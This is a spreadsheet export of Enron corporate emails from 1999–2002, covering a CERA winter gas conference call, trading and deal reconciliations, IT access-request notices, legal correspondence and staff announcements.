    <t>frozenset({'ken.powers@enron.com', 'dave.neubauer@enron.com', 'frank.oldenhuis@enron.com', 'rockey.storie@enron.com', 'loren.penkava@enron.com', 'john.dushinske@enron.com', 'steve.gilbert@enron.com', 'vernon.mercaldo@enron.com', 'larry.swett@enron.com', 'mike.ullom@enron.com', 'craig.buehler@enron.com', 'chuck.wilkinson@enron.com', 'laura.lantefield@enron.com', 'courtney.barker@enron.com', 'bob.stevens@enron.com', 'gary.choquette@enron.com', 'bryan.reinecke@enron.com', 'jim.wiltfong@enron.com', 'tony.perry@enron.com', 'ld.stephens@enron.com', 'kent.miller@enron.com', 'mike.barry@enron.com', 'kay.threet@enron.com', 'michael.bodnar@enron.com', 'rick.dietz@enron.com', 'tk.lohman@enron.com', 'lisa.valley@enron.com', 'jeff.nielsen@enron.com', 'kevin.hyatt@enron.com', 'roger.westfall@enron.com', 'tim.johanson@enron.com', 'allen.cohrs@enron.com', 'frank.semin@enron.com', 'miriam.martinez@enron.com', 'penny.mccarran@enron.com', 'doug.aschwege@enron.com', 'jo.williams@enron.com', 'robert.johnson@enron.com', 'martha.janousek@enron.com', 'robert.mason@enron.com', 'christine.stokes@enron.com', 'neal.shaw@enron.com', 'donna.scott@enron.com', 'sean.bolks@enron.com', 'stephanie.korbelik@enron.com', 'larry.pavlou@enron.com', 'dana.jones@enron.com', 'steve.thomas@enron.com', 'janet.bowers@enron.com', 'bob.burleson@enron.com', 'eileen.peebles@enron.com', 'lee.ferrell@enron.com', 'david.badura@enron.com', 'john.fiscus@enron.com', 'tracy.schwartzkopf@enron.com', 'kimberly.watson@enron.com', 'john.williams@enron.com', 'stephen.herber@enron.com', 'sheila.nacey@enron.com', 'sue.neville@enron.com', 'steven.harris@enron.com', 'morgan.gottsponer@enron.com', 'carolyn.descoteaux@enron.com', 'don.powell@enron.com', 'steve.weller@enron.com', 'steven.january@enron.com', 'reyna.cabrera@enron.com', 'lynn.blair@enron.com', 'lorraine.lindberg@enron.com', 'judy.beck@enron.com', 'becki.souci@enron.com', 'bill.mangels@enron.com', 'lindy.donoho@enron.com', 'michael.stage@enron.com', 'chris.sebesta@enron.com', 'ken.anderson@enron.com', 'jeffery.fawcett@enron.com', 'theresa.branney@enron.com', 'michelle.lokay@enron.com', 'karen.lagerstrom@enron.com', 'bill.fowler@enron.com', 'joni.bollinger@enron.com'})</t>
  </si>
  <si>
    <t>CERA Conference Call and Web Presentation: Winter Weather_x000D_
 Scenarios...</t>
  </si>
  <si>
    <t xml:space="preserve">CERA is going to do this conference call on Friday, November 17, at 2:00 _x000D_
p.m.  I will get us connected, so anyone that wants to attend can just follow _x000D_
the instructions below.  In Omaha, we will meet in Room 697.  The call will _x000D_
last about 30 minutes._x000D_
_x000D_
Lorna_x000D_
_x000D_
P. S. Connie, can you make sure we can get the conference room above?_x000D_
_x000D_
---------------------- Forwarded by Lorna Brennan/ET&amp;S/Enron on 11/13/2000 _x000D_
04:06 PM ---------------------------_x000D_
_x000D_
_x000D_
webmaster@cera.com on 11/10/2000 09:54:34 PM_x000D_
To: Lorna.Brennan@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: CERA Conference Call and Web Presentation: Winter Weather _x000D_
Scenarios... - CERA Conference Call_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
**********************************************************************_x000D_
CERA Conference Call: Sent Fri, November 10, 2000_x000D_
**********************************************************************_x000D_
_x000D_
Title: CERA Conference Call and Web Presentation: Winter Weather Scenarios..._x000D_
Author: N. American Gas Team_x000D_
E-Mail Category: Conference Call_x000D_
Product Line: North American Gas ,_x000D_
URL: http://www.cera.com/cfm/track/eprofile.cfm?u=5526&amp;m=1417 ,_x000D_
_x000D_
Alternative URL:_x000D_
http://www.cera.com/client/nag/cc/111000_18/nag_cc_111000_18_ab.html_x000D_
*************************************************************_x000D_
_x000D_
North American Natural Gas_x000D_
Conference Call and Web Presentation_x000D_
_x000D_
A Cambridge Energy Research Associates Conference Call_x000D_
_x000D_
TOPIC_x000D_
WINTER WEATHER SCENARIOS: BRACING FOR THE STORM_x000D_
* Demand potential under cold, normal, and warm weather_x000D_
conditions this winter. A return to normal weather will_x000D_
push demand well above last year's levels._x000D_
* Storage outlook. How low can it go?_x000D_
* Price. Limited demand flexibility and low storage_x000D_
levels will continue to drive prices through the winter._x000D_
_x000D_
FORMAT_x000D_
Our speakers will address this topic for 30 minutes,_x000D_
with accompanying graphics presented on the internet,_x000D_
followed by an open question and answer period._x000D_
_x000D_
SPEAKERS_x000D_
Ed Kelly, CERA Director of Research, North American_x000D_
Natural Gas_x000D_
Bryan Sanderson, CERA Associate, North American Natural_x000D_
Gas_x000D_
_x000D_
TIME_x000D_
3:00 P.M. Eastern, Friday, November 17, 2000_x000D_
_x000D_
ELIGIBILITY_x000D_
Clients eligible to participate in this conference call_x000D_
are those who subscribe to the CERA North American_x000D_
Natural Gas Retainer Advisory Service._x000D_
_x000D_
TO PARTICIPATE_x000D_
For the AUDIO portion of the call, please call in on one_x000D_
of the following numbers approximately 10-15 minutes_x000D_
before the call:_x000D_
_x000D_
Within the United States: 1-888-855-5428_x000D_
Outside the United States: (719) 457-2665_x000D_
Confirmation code: 432374_x000D_
Title of the call: CERA Gas Call_x000D_
_x000D_
For the INTERNET portion of the call (audio is by_x000D_
telephone), please log on to the internet approximately_x000D_
15-30 minutes before the presentation to ensure_x000D_
technological compatibility._x000D_
_x000D_
1. Point your browser to http://vcast.premconf.com. (Do_x000D_
not include WWW in the URL)_x000D_
2. At the VisionCast Home Page, click on "Attend a_x000D_
Private Conference."_x000D_
3. Follow all directions given regarding additional_x000D_
technology required (if any)._x000D_
4. You will be prompted for an Event Name (vc432374),_x000D_
your name, and your company name._x000D_
5. Fill in all fields and click "Continue."_x000D_
_x000D_
System Requirements and Suggestions:_x000D_
* Internet connection not reliant on the phone line you_x000D_
will use for the call._x000D_
* A Java-enabled browser, such as Microsoft Internet_x000D_
Explorer 3.02 or higher; Netscape Navigator 3.02 or_x000D_
higher; or Sun Hot JAVA(tm)_x000D_
* Close all desktop applications and disable your screen_x000D_
saver_x000D_
_x000D_
TECHNICAL ASSISTANCE_x000D_
U.S. Callers: If you are experiencing difficulties_x000D_
during the call, you may signal for technical assistance_x000D_
by pressing *0 (star, zero) on your telephone keypad_x000D_
after you have connected to the audio portion of the_x000D_
conference._x000D_
_x000D_
International Callers: Please re-dial and ask the_x000D_
operator for assistance before giving the confirmation_x000D_
code._x000D_
_x000D_
A recording of this call (audio only) will be available_x000D_
until December 17, 2000. To access this recording,_x000D_
please call 1-888-203-1112 (within the U.S.) or (719)_x000D_
457-0820 (outside the U.S.). Please use confirmation_x000D_
number 432374 to access the call._x000D_
_x000D_
If you have any questions, please contact Mary Rice via_x000D_
e-mail at mrice@cera.com, or via telephone at (617) 498-_x000D_
9123._x000D_
_x000D_
_x000D_
**end**_x000D_
_x000D_
Follow URL for HTML version of this message only.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_x000D_
</t>
  </si>
  <si>
    <t>Tue, 14 Dec 1999 00:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bryan.hull@enron.com', 'david.baumbach@enron.com'})</t>
  </si>
  <si>
    <t>Risk Book Post ID's for EOL Reporting</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Eric Bass/HOU/ECT on 12/14/99 08:57 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Torrey Moorer_x000D_
12/13/99 07:45 PM_x000D_
To: David Oliver/HOU/ECT@ECT, Mark Friedman/HOU/ECT@ECT, Jeffrey C _x000D_
Gossett/HOU/ECT@ECT, Kimat Singla/HOU/ECT@ECT, Reagan Mathews/HOU/ECT@ECT, _x000D_
Tony Harris/HOU/ECT@ECT, Dutch Quigley/HOU/ECT@ECT, Julie E Love/HOU/ECT@ECT, _x000D_
Eric Bass/HOU/ECT@ECT, O'Neal D Winfree/HOU/ECT@ECT, Kathy Reeves/CAL/ECT@ECT_x000D_
cc: Bob Shults/HOU/ECT@ECT, Jennifer deBoisblanc Denny/HOU/ECT@ECT _x000D_
Subject: Risk Book Post ID's for EOL Reporting_x000D_
_x000D_
There has apparently been some misunderstanding regarding the scope of _x000D_
calculations that must be covered under the Post ID's submitted for EOL _x000D_
reporting each night. Many desks are turning in post IDs which only cover _x000D_
books in which EOL activity has taken place, thus ommitting many other _x000D_
non-eol trades. What is needed is post IDs which will collectively cover the _x000D_
entire universe of gas trading which has taken place on a given desk. In _x000D_
running the collective post ID's we need to be able to capture all trading _x000D_
which has taken place on a given day and the scope of the post ID's must _x000D_
cover this. _x000D_
</t>
  </si>
  <si>
    <t>Tue, 14 Dec 1999 11:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'info@amazon.com'})</t>
  </si>
  <si>
    <t>Amazon.com Password Change Confirmation</t>
  </si>
  <si>
    <t>Greetings from Amazon.com!_x000D_
_x000D_
You have successfully changed your password._x000D_
_x000D_
Please note that you can view the status of your account, examine_x000D_
your orders, cancel unshipped orders, change your e-mail address or_x000D_
password, or update your subscriptions to our Personal Notification_x000D_
Services at any time through the "Your Account" link on the_x000D_
navigation bar._x000D_
_x000D_
   http://www.amazon.com/your-account_x000D_
_x000D_
---------------------------------------------------------------------_x000D_
Amazon.com_x000D_
Earth's Biggest Selection_x000D_
orders@amazon.com      http://www.amazon.com/_x000D_
---------------------------------------------------------------------</t>
  </si>
  <si>
    <t>Fri, 14 Jul 2000 03:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mary.miller@enron.com', 'dari.dornan@enron.com', 'steve.kirk@enron.com', 'maria.pavlou@enron.com', 'glen.hass@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Great draft!  I had just a few comments and typos, set out in this redline.  _x000D_
I'll be in to take a look at the tariff sheets a bit later this AM.  Thanks _x000D_
for the excellent work!   Martha, pls copy for Steve Stojic.  _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 18 Jun 2002 00:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kevin.cousineau@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'mark.walker@enron.com', 'mark.fisher@enron.com', 'hollis.kimbrough@enron.com'})</t>
  </si>
  <si>
    <t>Meter Readings</t>
  </si>
  <si>
    <t xml:space="preserve">Guys: _x000D_
_x000D_
Attached are the meter readings for Indian Mesa for both feeders _x000D_
(transformers). They includ the production and the cumsumption, and cover a _x000D_
period between May 19 and June 10. _x000D_
_x000D_
I think this is the best way to determine the actual consumption, because _x000D_
these are the meters that the customer gets paid on and is charged for. _x000D_
_x000D_
Regards _x000D_
_x000D_
KLC _x000D_
---------------------- Forwarded by Kevin Cousineau/EWC/Enron on 06/17/2002 _x000D_
08:17 PM ---------------------------_x000D_
_x000D_
_x000D_
Russell Leach_x000D_
06/18/2002 06:34 AM_x000D_
To: Kevin Cousineau/EWC/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Meter Readings_x000D_
_x000D_
Kevin:_x000D_
_x000D_
I hope this is what you were looking for. If not please call._x000D_
_x000D_
Russ_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 20 Apr 2000 02:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'cdalpho@columbiaenergygroup.com', 'dkinney@columbiaenergygroup.com', 'jporte1@columbiaenergygroup.com'})</t>
  </si>
  <si>
    <t>Re: Joanie</t>
  </si>
  <si>
    <t xml:space="preserve">My fault.  The numbers in yellow are estimates._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 9 Oct 2000 12:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'arsystem@ect.enron.com'})</t>
  </si>
  <si>
    <t>Approval is Overdue: Access Request for peter.makkai@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">This request has been pending approval for  5 days and you are the _x000D_
alternate.  Please click _x000D_
http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000003997&amp;Page=_x000D_
Approval to review and act upon this request._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000003997_x000D_
Approver            : stinson.gibner@enron.com_x000D_
Request Create Date : 10/3/00 1:14:27 PM_x000D_
Requested For       : peter.makkai@enron.com_x000D_
Resource Name       : \\enehou\houston\common\Research - [Read]_x000D_
Resource Type       : Directory_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 05:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Request Submitted: Access Request for kenneth.lim@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">You have received this email because you are listed as a security approver. _x000D_
Please click _x000D_
http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000007588&amp;Page=_x000D_
Approval to review and act upon this request._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000007588_x000D_
Request Create Date : 11/16/00 11:17:54 AM_x000D_
Requested For       : kenneth.lim@enron.com_x000D_
Resource Name       : EOL US Backoffice  Product Data Manager_x000D_
Resource Type       : Applications_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Aug 2000 12:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Interconnection agreements</t>
  </si>
  <si>
    <t>Steve talked to us and it is now clear - re point to point services, etc for_x000D_
tariffs for ETI._x000D_
_x000D_
jdasovic@enron.com wrote:_x000D_
_x000D_
&gt; We talked about this in detail with Steve when he was in Houston. Please_x000D_
&gt; check with him.  The idea is that there would be the flexibility necessary_x000D_
&gt; to do just about anything.  Also, there are problems with the decision that_x000D_
&gt; Steve was going to talk with Pulsifer about.  Need to get status of those_x000D_
&gt; conversations.My understanding was that, if there's a problem with the_x000D_
&gt; decision, perhaps our filing would be pushed a bit past the Tuesday.  We'll_x000D_
&gt; need to find that out, too._x000D_
&gt;_x000D_
&gt; Jeremy Meier &lt;jermeier@earthlink.net&gt; on 08/30/2000 11:27:10 AM_x000D_
&gt;_x000D_
&gt; To:   jdasovic@enron.com_x000D_
&gt; cc:_x000D_
&gt; Subject:  Re: Interconnection agreements_x000D_
&gt;_x000D_
&gt; J:_x000D_
&gt;_x000D_
&gt; Are there additional service offerings (DWDM, etc.) that Enron wants to_x000D_
&gt; offer in California (Steve indicated you guys talked about that) - and if_x000D_
&gt; so, is there a narrative or did Steve get any specific info - for filing_x000D_
&gt; with CPUC per final Decision?_x000D_
&gt;_x000D_
&gt; We have to file updated tariffs next Tuesday - and want to include the_x000D_
&gt; latest company service offerings._x000D_
&gt;_x000D_
&gt; J_x000D_
&gt;_x000D_
&gt; jdasovic@enron.com wrote:_x000D_
&gt;_x000D_
&gt; &gt; Hi.  Thanks for all the help.  Life's nuts.  I'll try to give you a call_x000D_
&gt; &gt; later in the day and catch up._x000D_
&gt; &gt;_x000D_
&gt; &gt; Jeremy Meier &lt;jermeier@earthlink.net&gt; on 08/25/2000 05:56:29 PM_x000D_
&gt; &gt;_x000D_
&gt; &gt; To:   jdasovic@enron.com_x000D_
&gt; &gt; cc:_x000D_
&gt; &gt; Subject:  Interconnection agreements_x000D_
&gt; &gt;_x000D_
&gt; &gt; Jeff:_x000D_
&gt; &gt;_x000D_
&gt; &gt; Welcome back.  We did send the Analysis Memo last week to all, with some_x000D_
&gt; &gt; small difficulty discerning correct email addresses for the various_x000D_
&gt; &gt; folks.  Please let us know if anyone did not get their copy._x000D_
&gt; &gt;_x000D_
&gt; &gt; You have several electronic version of interconnection agreements for_x000D_
&gt; &gt; California, and we can discuss at your convenience.  The process for_x000D_
&gt; &gt; adopting an agreement "as is" is fairly straightforward in Calif and_x000D_
&gt; &gt; will not take that long (a few weeks)._x000D_
&gt; &gt;_x000D_
&gt; &gt; We are also filing updated pages for tariffs, including substantive_x000D_
&gt; &gt; service changes which Steve mentioned.  We can show you any documents_x000D_
&gt; &gt; before filing (9/5/00 is the last day)._x000D_
&gt; &gt;_x000D_
&gt; &gt; Please feel free to let us know any questions,_x000D_
&gt; &gt;_x000D_
&gt; &gt; Jeremy Meier_x000D_
&gt; &gt; Blumenfeld &amp; Cohen</t>
  </si>
  <si>
    <t>Fri, 26 Jan 2001 08:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Deals # 497865 and 497869</t>
  </si>
  <si>
    <t>Judy at EES has different totals for these two deals.  For #498865 at NP15, _x000D_
she has total volume of 13,319.  For #497869 at SP15 she has a total volume _x000D_
of 8516.6.  Do you know of any reason that these total volumes would be _x000D_
different than what EES is showing?_x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Credit Review Meeting EB13C2</t>
  </si>
  <si>
    <t>CALENDAR ENTRY:	APPOINTMENT_x000D_
_x000D_
Description:_x000D_
	Credit Review Meeting EB13C2_x000D_
_x000D_
Date:		12/4/2000_x000D_
Time:		2:00 PM - 3:30 PM (Central Standard Time)_x000D_
_x000D_
Chairperson:	Outlook Migration Team_x000D_
_x000D_
Detailed Description:</t>
  </si>
  <si>
    <t>Tue, 22 May 2001 14:06:22 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: HPL Texoma, Meter 9801071 - 05/10/01</t>
  </si>
  <si>
    <t xml:space="preserve">Daren,_x000D_
_x000D_
Please see deal 229758 for this matter.  I nominated this transport  for 5/10 to 5/16.  Should there be a deal there?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mary Poorman_x000D_
05/22/2001 03:43 PM_x000D_
To:	Daren J Farmer/HOU/ECT_x000D_
cc:	Michael Olsen/NA/Enron@Enron, Clay Cook/ENRON@enronXgate, Sabrae Zajac/HOU/ECT@ECT, Edward Terry/HOU/ECT@ECT _x000D_
_x000D_
Subject:	HPL Texoma, Meter 9801071 - 05/10/01_x000D_
_x000D_
Daren,_x000D_
_x000D_
The intercompany/interdesk reflects an error for the above referenced day.  A transport usage ticket was put into the system for 3,000 Dth (Duke Carthage to Texoma), however, we do not have any supply on EPGT from Duke for this deal.  The package was confirmed, according to POPS, so, we are probably missing the supply deal.  Please check on the day/price (it is the 3,000 on k# ta99027 on EPGT).  I am trying to take care of some of these current month issues on the "clean reports"._x000D_
_x000D_
Mike,_x000D_
_x000D_
Would you please make sure that this contract was nominated on EPGT for 5/10/01._x000D_
_x000D_
Thank you both for your assistance (everyone else is FYI),_x000D_
_x000D_
Mary_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Feb 2001 11:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Badlands Unit</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
If this Badlands unit goes down we need to Dec EES load in SP15 and zero out _x000D_
the generation schedule.  Do not try to buy to fill them.  Chris Foster just _x000D_
wanted to make this clear to our group.  For information about this unit you _x000D_
can contact Peter Arellano with Riverside on his cell # 909-314-7752.  See _x000D_
attachment below for more numbers._x000D_
_x000D_
Thanks,_x000D_
Holden_x000D_
_x000D_
---------------------- Forwarded by Holden Salisbury/PDX/ECT on 02/20/2001 _x000D_
09:19 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Chris H Foster                           02/20/2001 02:51 PM_x000D_
	_x000D_
_x000D_
To: Holden Salisbury/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Schedule for 2/22_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Chris H Foster/HOU/ECT on 02/20/2001 _x000D_
12:50 PM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Peter Arellano" &lt;PARELLAN@co.riverside.ca.us&gt;                         _x000D_
  02/20/2001 12:28 PM_x000D_
	_x000D_
_x000D_
To: &lt;cfoster@enron.com&gt;, &lt;cmallory@enron.com&gt;, &lt;dkang@enron.com&gt;, _x000D_
&lt;hdunton@enron.com&gt;, &lt;jrichte@enron.com&gt;, &lt;jwhalan@enron.com&gt;, _x000D_
&lt;nbresnan@enron.com&gt;, &lt;negmar@enron.com&gt;, &lt;pplatte@enron.com&gt;, _x000D_
&lt;rring@enron.com&gt;_x000D_
cc: "Hans Kernkamp" &lt;HKERNKAM@co.riverside.ca.us&gt;, "Mark Hunt" _x000D_
&lt;MHUNT@co.riverside.ca.us&gt; _x000D_
Subject: Schedule for 2/22_x000D_
_x000D_
_x000D_
See attached._x000D_
_x000D_
 - dasq.xls_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 11 Jan 2002 10:28:14 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'gelliott@industrialinfo.com'})</t>
  </si>
  <si>
    <t>frozenset({'pcopello@industrialinfo.com'})</t>
  </si>
  <si>
    <t>WSCC (San Juan &amp; Colstrip) &amp; NPCC (Northport) Forced/Resched_x000D_
 Outages</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Power Outage Database Customer, _x000D_
Attached you will find an excel document. The outages contained within are forced or rescheduled outages. Your daily delivery _x000D_
will still contain these outages. _x000D_
In addition to the two excel documents, there is a dbf file that is formatted like your daily deliveries you receive nightly. This will _x000D_
enable you to load the data into your regular database. Any questions please let me know. Thanks. _x000D_
Greg Elliott _x000D_
IIR, Inc. _x000D_
713-783-5147 x 3481 _x000D_
outages@industrialinfo.com _x000D_
THE INFORMATION CONTAINED IN THIS E-MAIL IS LEGALLY PRIVILEGED AND CONFIDENTIAL INFORMATION INTENDED ONLY FOR THE USE OF THE INDIVIDUAL OR ENTITY NAMED ABOVE.  YOU ARE HEREBY NOTIFIED THAT ANY DISSEMINATION, DISTRIBUTION, OR COPY OF THIS E-MAIL TO UNAUTHORIZED ENTITIES IS STRICTLY PROHIBITED. IF YOU HAVE RECEIVED THIS E-MAIL IN ERROR, PLEASE DELETE IT._x000D_
 - OUTAGE.dbf _x000D_
 - 011102.xls _x000D_
 - 011102R.xls </t>
  </si>
  <si>
    <t>Mon, 5 Mar 2001 23:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'cheryl.kuehl@enron.com'})</t>
  </si>
  <si>
    <t>eSpeak Transcript</t>
  </si>
  <si>
    <t xml:space="preserve">In case you were not able to view Charlene Jackson's February 22nd eSpeak,_x000D_
_x000D_
attached below is the transcript for your convenience._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 14 Apr 2000 02:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: SWAP GROUP CALENDARS - APRIL &amp; MAY, 2000</t>
  </si>
  <si>
    <t>Taffy_x000D_
We need the attachment_x000D_
CArol</t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 01:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Request Submitted: Access Request for wes.williams@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">You have received this email because you are listed as a security approver. _x000D_
Please click _x000D_
http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000008544&amp;Page=_x000D_
Approval to review and act upon this request._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000008544_x000D_
Request Create Date : 11/29/00 9:30:01 AM_x000D_
Requested For       : wes.williams@enron.com_x000D_
Resource Name       : EOL US Backoffice  Reports_x000D_
Resource Type       : Applications_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 8 Jul 2001 10:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>eThink About It: 07/09/01</t>
  </si>
  <si>
    <t>Do you know that Enron is committed to providing procurement opportunities to _x000D_
minority and women-owned business enterprises?  Do you know how it works?  _x000D_
Ask Calvin Eakins, director of Minority &amp; Women Business Development about _x000D_
his group's goals for 2001.  Tuesday, July 10 on eSpeak at 10 a.m. Houston _x000D_
time._x000D_
_x000D_
Can't make the live event?  No worries.  Go to eSpeak (_x000D_
http://ethink.enron.com/eSpeak/exec/default.asp) now and submit your _x000D_
question.  Calvin will try to answer it during his event and you can read the _x000D_
transcript later._x000D_
_x000D_
_x000D_
How do you feel about Enron's cost savings initiatives? Have you thought of _x000D_
some innovative ways to save money?  Talk amongst yourselves in eMeet  _x000D_
http://nahou-lnapp01.corp.enron.com/eThink/eMeet.nsf ._x000D_
_x000D_
_x000D_
_x000D_
This week's ideas deposited into the Idea Vault include such interesting _x000D_
concepts as California time-of-day remote metering via broadband and prepaid _x000D_
gas cards.  Go to the Thinkbank (_x000D_
http://nahou-lnapp01.corp.enron.com/eThink/Thinkbank.nsf/HomePage?OpenPage) _x000D_
for all the details.</t>
  </si>
  <si>
    <t>Thu, 21 Dec 2000 10:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'enronoptions.mailing@enron.com'})</t>
  </si>
  <si>
    <t>EnronOptions Announcement</t>
  </si>
  <si>
    <t>EnronOptions Announcement_x000D_
_x000D_
_x000D_
You can now access a web site that describes EnronOptions =01) Your Stock O=_x000D_
ption=20_x000D_
Program.  The web site contains some highlights of the EnronOptions Program=_x000D_
=20_x000D_
as well as some Frequently Asked Questions (FAQs)._x000D_
_x000D_
Access EnronOptions =01) Your Stock Option Program web site by clicking on=_x000D_
=20_x000D_
http://hrweb.enron.com or by typing the address into your web browser._x000D_
_x000D_
We hope you find the site helpful in addressing your questions about the=20_x000D_
EnronOptions Program.  If you have any questions, please contact your H.R.=_x000D_
=20_x000D_
Representative._x000D_
_x000D_
There will be several EnronOptions - Your Stock Option Program presentation=_x000D_
s=20_x000D_
throughout the month of January.  Stay tuned to a computer near you for=20_x000D_
details.</t>
  </si>
  <si>
    <t>Fri, 9 Feb 2001 03:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jennifer.nguyen@enron.com', 'georgeanne.hodges@enron.com', 'jan.johnson@enron.com', 'adarsh.vakharia@enron.com', 'sally.beck@enron.com', 'hope.vargas@enron.com', 'gary.peng@enron.com', 'cassandra.schultz@enron.com', 'tatiana.waxler@enron.com', 'shona.wilson@enron.com'})</t>
  </si>
  <si>
    <t>Georgeanne just told me that the Lehman and Jedi swaps do not hedge each _x000D_
other._x000D_
_x000D_
Regards,_x000D_
_x000D_
_x000D_
_x000D_
Eugenio</t>
  </si>
  <si>
    <t>Tue, 22 May 2001 06:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Enron Xcelerator</t>
  </si>
  <si>
    <t xml:space="preserve">Not clear at this point.  No deals have been done.  My guess is that it will _x000D_
be Lance and his group.  I will let you know when it gets sorted out.  Mark_x000D_
_x000D_
_x000D_
_x000D_
	"Swanstrom, Bill" &lt;BSwanstrom@lockeliddell.com&gt;_x000D_
	05/20/2001 12:04 PM_x000D_
		 _x000D_
		 To: "'mark.e.haedicke@enron.com'" &lt;mark.e.haedicke@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Enron Xcelerator_x000D_
_x000D_
Mark, who within the Enron legal group is responsible for Enron Excelerator?  _x000D_
From what I've heard about this initiative, it sounds like it may be doing _x000D_
deals similar to what we've done for Enron in the past.  We'd love to get the _x000D_
opportunity to help -- we have valuable experience we can bring to bear in _x000D_
this area.  Thanks._x000D_
 _x000D_
H. William Swanstrom_x000D_
Locke Liddell &amp; Sapp LLP_x000D_
bswanstrom@lockeliddell.com_x000D_
(713) 226-1143_x000D_
 _x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Tue, 21 Dec 1999 08:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Mark Taylor/HOU/ECT on 12/21/99 04:59 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
"CINDY EVANGELISTA" &lt;CINDY_EVANGELISTA@cemexusa.com&gt; on 12/21/99 10:15:08 AM_x000D_
To: Mark Taylor/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Confidentiality Agreement_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mark:_x000D_
_x000D_
Have the documents sent by messenger here to the Riverway address, to the_x000D_
attention of Rose Mary Clyburn._x000D_
_x000D_
Cemex USA_x000D_
One Riverway, Suite 2200_x000D_
Houston, Texas  77056_x000D_
_x000D_
Thanks!_x000D_
_x000D_
I will be on vacation the rest of the week.  But Rose Mary will be here_x000D_
tomorrow._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Mark Taylor" &lt;mtaylo1@ect.enron.com&gt; on 12/21/99 09:44:13 PM_x000D_
_x000D_
To:   CINDY EVANGELISTA@CEMEX_x000D_
cc:_x000D_
Subject:  Re: Confidentiality Agreement_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Cindy:_x000D_
_x000D_
We have the signed letters - where should we send them?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"CINDY EVANGELISTA" &lt;CINDY_EVANGELISTA@cemexusa.com&gt; on 12/20/99 10:17:18 AM_x000D_
_x000D_
To:   Mark Taylor/HOU/ECT@ECT_x000D_
cc:_x000D_
Subject:  Re: Confidentiality Agreement_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Thanks!  I will send it over first thing in the morning._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Mark Taylor" &lt;mtaylo1@ect.enron.com&gt; on 12/20/99 10:09:22 PM_x000D_
_x000D_
To:   CINDY EVANGELISTA@CEMEX_x000D_
cc:_x000D_
Subject:  Re: Confidentiality Agreement_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
You can send it to :_x000D_
_x000D_
Mark Taylor_x000D_
Enron North America - EB3889_x000D_
1400 Smith Street_x000D_
Houston, TX 77002_x000D_
_x000D_
Thanks!_x000D_
_x000D_
_x000D_
_x000D_
